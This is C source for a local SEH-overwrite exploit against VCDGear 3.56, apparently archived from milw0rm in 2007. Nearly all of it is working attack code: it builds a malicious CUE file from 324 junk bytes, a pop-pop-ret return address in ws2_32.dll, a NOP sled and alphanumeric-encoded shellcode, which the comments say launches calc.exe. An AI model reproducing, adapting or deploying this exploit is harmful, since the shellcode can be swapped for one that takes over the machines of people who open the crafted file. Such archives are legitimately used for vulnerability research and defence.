/* ~~~~~~~~~~~~~~0day~~~~~~~~~~~~~~~~~~
Discovered by: InTeL
Auther: InTeL
Attack Vector: SEH overwrite
Type: Local
Tested on Win2k SP4 (English)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: VCDGear v3.56 build 050213
Website: www.vcdgear.com
Description:

"VCDGear is a program designed to allow a user to extract MPEG streams from CD images, convert VCD files to MPEG, 
correct MPEG errors, and more -- all in a single step. Initially developed back in late 1997, the program has 
grown to do various extractions, conversions, and corrections on the fly. Cross-platform support will allow 
different machines to process and generate output that is compatible between one another. 

Total Buf Size: 2512 - [Junk - 324][SEH overwrite - 8][NOP Sled and Shellcode room for - 2180]

Greetz: erazerz, m03, devcode, #pen15
*/

#include <stdlib.h>
#include <stdio.h>

// Exec Calc.exe Scode
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";


int main(int argc, char *argv[])
{
	FILE *handle;

	if(argc < 2) {
		printf("0day VCDGear exploit\n");
		printf("Usage: %s <output CUE file>", argv[0]);
		return 0;
	}

	if(!(handle = fopen(argv[1], "w"))) {
		printf("[+] Error");
		return 0;
	}

	fputs("FILE \"", handle);
	for (int i=0;i<324;i++) \
		fputs("A", handle);
	
	fputs("\xeb\x32\x90\x90", handle);
	fputs("\x3a\x1f\x03\x75", handle); //pop edi, pop esi, retn in ws2_32.dll (English / 	5.0.2195.6601)
	for (i=0;i<200;i++) 
		fputs("\x90", handle);

	fputs((char *)scode, handle);
	fputs("\" BINARY\n", handle);
	fputs(" TRACK 01 MODE2/2352\n", handle);
	fputs(" INDEX 01 00:00:00\n", handle);
	
	fclose(handle);
	
	printf("[+] File successfully created");

	return 0;
}

// milw0rm.com [2007-04-13]
